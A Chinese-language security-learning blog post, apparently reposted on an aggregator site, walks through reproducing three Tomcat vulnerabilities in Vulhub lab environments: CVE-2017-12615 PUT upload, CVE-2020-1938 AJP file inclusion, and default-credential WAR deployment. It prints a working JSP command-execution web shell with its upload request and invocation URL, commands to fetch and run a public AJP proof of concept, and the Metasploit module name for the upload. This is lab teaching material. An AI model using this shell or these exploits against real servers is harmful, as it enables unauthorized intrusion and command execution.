中间件安全—Tomcat常见漏洞

这篇具有很好参考价值的文章主要介绍了中间件安全—Tomcat常见漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.Tomcat常见漏洞

1.1.前言

  整个复现环境均使用Vulhub一键搭建漏洞测试靶场,Vulhub靶场:链接

1.2.文件上传 (CVE-2017-12615)

1.2.1.漏洞原理

  Tomcat配置文件/conf/web.xml 配置了可写(readonly=false),导致可以使用PUT方法上传任意文件,攻击者将精心构造的payload向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.2.2.影响版本

  Apache Tomcat 7.0.0 – 7.0.81

1.2.3.漏洞复现

1.2.3.1.测试是否允许PUT

  这里修改请求方式为OPTIONS /xx HTTP/1.1,通过修改后发现允许PUT方法。
tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.2.3.2.验证漏洞是否存在

  这里修改请求方式为:PUT /test.jsp/ HTTP/1.1,请求体为:<%out.print(“hacker”); %>,然后访问test.jsp。
tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.2.3.3.访问test.jsp
URL:http:ip地址:端口/test.jsp

tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.2.3.4.上传执行命令脚本

  修改请求头PUT /test.jsp/ HTTP/1.1,修改请求体。

请求体:
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.2.3.5.执行命令
http://ip地址:8080/test.jsp?&pwd=123&cmd=ls

tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.3.文件包含漏洞(CVE-2020-1938)

1.3.1.漏洞原理

  Tomcat 配置了两个Connecto,它们分别是 HTTP 和 AJP :HTTP默认端口为8080,处理http请求,而AJP默认端口8009,用于处理 AJP 协议的请求,而AJP比http更加优化,多用于反向、集群等,漏洞由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件以及可以包含任意文件,如果有某上传点,上传图片马等等,即可以获取shell。

1.3.2.影响版本

  Apache Tomcat 6
  Apache Tomcat 7 < 7.0.100
  Apache Tomcat 8 < 8.5.51
  Apache Tomcat 9 < 9.0.31
  开启了8009端口的ajp服务

1.3.3.漏洞复现

1.3.3.1.访问页面

  访问http://your-ip:8080即可查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。
tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.3.3.2.POC下载

  POC链接:链接
  当然你也可以在kali中使用命令进行下载,检测等,不过我这里由于网络原因一直下载不下来,我就用本机下载再上传虚拟机了。

命令:
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi  
cd CNVD-2020-10487-Tomcat-Ajp-lfi  
python CNVD-2020-10487-Tomcat-Ajp-lfi.py    #py2环境  

tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.3.3.3.POC验证

  这里查看8009端口下的web.xml文件

命令:python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py IP地址 -p 8009 -f /WEB-INF/web.xml

tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.4.弱口令&war远程部署

1.4.1.漏洞原理

  在tomcat8环境下默认进入后台的密码为tomcat/tomcat,未修改造成未授权即可进入后台。

1.4.2.影响版本

  全版本

1.4.3.漏洞复现

1.4.3.1.访问后台

  这里首先需要先访问后台管理。

http://ip地址:8080/manager/html

tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.4.3.2.后台管理

  在后台有一个上传war包的地方,这里就是我们用来上传木马的地方,这里我没准备jsp马,我使用msf来进行操作吧。
tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.4.3.3.进入模块

  进入msf里面的exploit/multi/http/tomcat_mgr_upload模块。
tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器

1.4.3.4.获取shell

  我这边由于使用云服务器,存在反弹的端口不通,可能被拦截了,所以就没有反弹回来。
tomcat漏洞,网络安全学习,# 中间件安全,tomcat,中间件,web安全,信息与通信,服务器文章来源地址https://www.toymoban.com/news/detail-717520.html

到了这里,关于中间件安全—Tomcat常见漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 中间件安全—Apache常见漏洞

      简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。 1.2.1.漏洞

    2024年01月22日
    浏览(51)
  • 中间件安全—Nginx常见漏洞

      在上篇中间件安全—Apache常见漏洞中,并未对中间件漏洞进行解释,这里补充一下。   所谓的中间件漏洞就是并非是由于代码程序上设计存在缺陷而导致的漏洞,而是属于应用部署中环境配置不当或使用不当而导致的漏洞,同时这方面的漏洞也是最容易被管理员忽略的

    2024年02月09日
    浏览(45)
  • 第59天-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx

    文章仅供学习交流,一些价值不高的漏洞没复现,日后来兴趣再补坑(大概~) 文章略长,阅读需耐心~ 视频链接:  【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目录 一.知识点 二.章节内容 1、常见中间件的安全测试 2、

    2024年02月20日
    浏览(60)
  • 小迪安全 第59天 服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx

    IIS现在用的也少了,漏洞也基本没啥用  没有和权限挂钩 windows 2003上面的漏洞 配置不当:该漏洞与 Nginx、php 版本无关,属于用户配置不当造成的解析漏洞。 这个跟文件上传类似,找到文件上传点,上传png图片 找到上传路径和nginx版本号 查看路径 添加后缀可以用php执行png

    2024年02月04日
    浏览(100)
  • Day79:服务攻防-中间件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    目录 中间件-IIS-短文件文件解析蓝屏写权限 HTTP.SYS(CVE-2015-1635)主要用作蓝屏破坏,跟权限不挂钩 IIS短文件(iis全版本都可能有这个问题) IIS文件解析 IIS写权限 中间件-Nginx-文件解析目录穿越漏洞CRLF CVE-2013-4547 文件上传 解析漏洞(配置不当) 目录穿越(配置不当) CRLF注入(配置

    2024年04月08日
    浏览(56)
  • 中间件安全:Apache Tomcat 弱口令.(反弹 shell 拿到服务器的最高控制权.)

    Tomcat  是 Apache 软件基金会(Apache Software Foundation)的 Jakarta 项目中的一个核心项目,由 Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署 war 包 geshell . 中间件安全:Apache Tomcat 弱口令. Apache Tomcat 弱口令: 靶场准备:Web安全:Vulfocus 靶场搭建.(漏

    2024年02月05日
    浏览(65)
  • Tomcat中间件打印请求日志

    修改conf下的 server.xml 文件中的 Valve 配置 主要修改pattern的值 相关pattern的含义可以参考官方文档,这里贴上方便查询 最后打印格式如下 在SpringBoot使用嵌入式Tomcat可以在配置文件中按照如下配置 directory可以配置相对路径或绝对路径,如果是相对路径,那么最终会放在Tomcat的基

    2024年02月07日
    浏览(57)
  • 性能优化-中间件tomcat调优

    主要有三个: 管理Servlet应用的生命周期。Tomcat可以管理和控制Servlet应用程序的启动、停止、暂停和恢复等生命周期过程,确保Servlet应用的稳定运行和有序管理。 把客户端请求的url映射到对应的servlet。Tomcat作为一个Web服务器,可以将客户端发送的HTTP请求URL映射到相应的Se

    2024年02月07日
    浏览(52)
  • 笔记:常见中间件漏洞

    Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的Cookie, 在服务端对rememberMe的Cookie值先base64解码然后AES解密再反序列化 序列化:序列化=》使用密钥进行AES加密=》base64加密 反序列化:base64解密=》使用密钥进行AES解密=》反序列化 因为默

    2024年02月13日
    浏览(42)
  • Web中间件常见漏洞

    Web中间件常见漏洞 我们常见的中间件有apache,tomcat,IIS,weblogic(其实就是web容器),这些中间件可以设置支持的HTTP方法。每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传

    2024年02月14日
    浏览(69)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包